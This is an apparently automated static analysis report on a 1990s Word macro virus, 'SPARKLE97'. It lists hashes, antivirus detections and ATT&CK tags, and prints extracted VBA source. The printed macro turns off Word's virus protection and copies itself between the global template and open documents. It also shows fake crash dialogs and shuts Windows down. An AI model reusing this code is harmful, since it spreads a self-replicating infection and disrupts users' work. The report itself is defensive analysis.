Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b64c9aa93d6e5d3a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 63.5 KB
Created: 1997-05-02 17:28:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 6f495226da1b7b76458261ade4f362dc
SHA-1: b265920d8ba5f1b9e237212d6ab6e9413d4d80ab
SHA-256: b64c9aa93d6e5d3a3db5a7e065e0553e8caf4af5918eead392d75535f34f5070
Risk score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros. The macro code, specifically the 'Sparkle' subroutine, attempts to copy itself and its associated user forms ('userform999', 'userform900') from the Normal template to the active document. This behaviour is indicative of macro-based malware designed for persistence or propagation. The ClamAV detections 'Doc.Trojan.Beauty-1' and 'Doc.Trojan.Sparkle-2' further support the malicious nature of the file.

Heuristics (2)

  • ClamAV: Doc.Trojan.Beauty-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Beauty-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16108 bytes
SHA-256: 0ff9aac1a69629dda42ecd5605df0cb5e276c0e4c96aef6c9dd9b5b258d6dc85
Detection: ClamAV: Doc.Trojan.Sparkle-2
Obfuscation or payload: unlikely
Extracted script preview (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "Sparkle"
Sub FileSave()
    On Error GoTo Error
    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False

    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "Sparkle" Then
            DocumentInstalled = True
        End If
        Next
    For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "Sparkle" Then
            GlobalInstalled = True
        End If
        Next
    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Sparkle", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="userform999", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="userform900", Object:=wdOrganizerObjectProjectItems
    With ActiveDocument
        .BuiltInDocumentProperties(wdPropertyTitle) = "SPARKLE97"
        .BuiltInDocumentProperties(wdPropertySubject) = "Word Macro Virri"
        .BuiltInDocumentProperties(wdPropertyAuthor) = "Talon 1997"
        .BuiltInDocumentProperties(wdPropertyManager) = "Talon 1997"
        .BuiltInDocumentProperties(wdPropertyCompany) = "Eifel Epidemic"
        .BuiltInDocumentProperties(wdPropertyComments) = "This Word Macro Virus Was Made By Talon"
         End With
        End If
    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Sparkle", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="userform999", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="userform900", Object:=wdOrganizerObjectProjectItems
        End If

Sparkle
Error:
End Sub
Sub Toolsmacro()
On Error GoTo Error
userform999.Show
Error:
End Sub
Sub Filetemplates()
On Error GoTo Error
userform900.Show
Error:
End Sub
Sub Sparkle()
On Error GoTo Error
If WeekDay(Now()) = 2 And Hour(Now()) = 9 Then
With ActiveDocument.Content
    .Font.Animation = wdAnimationSparkleText
Application.StatusBar = True
StatusBar = "Your Infected With The Word Macro Virus SPARKLE97, Talon"
Application.Caption = "Your Infected With The Word Macro Virus SPARKLE97, Talon"
End With
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormatTemplate
Error:
End Sub
Sub ViewVbCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Tasks.ExitWindows
End Sub

Attribute VB_Name = "userform999"
Attribute VB_Base = "0{77DA0ACF-C32C-11D0-B4FA-444553540000}{77DA0AC9-C32C-11D0-B4FA-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ListBox2_Click()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Unload userform999
End Sub
Private Sub UserForm_Initialize()
    ComboBox1.AddItem "Normal.dot(global template)"
End Sub
Private Sub CommandButton2_Click()
Unload userform999
End Sub
Private Sub CommandButton5_Click()
MsgBox "This program has performed an illegal operation and will shut down.
... (truncated)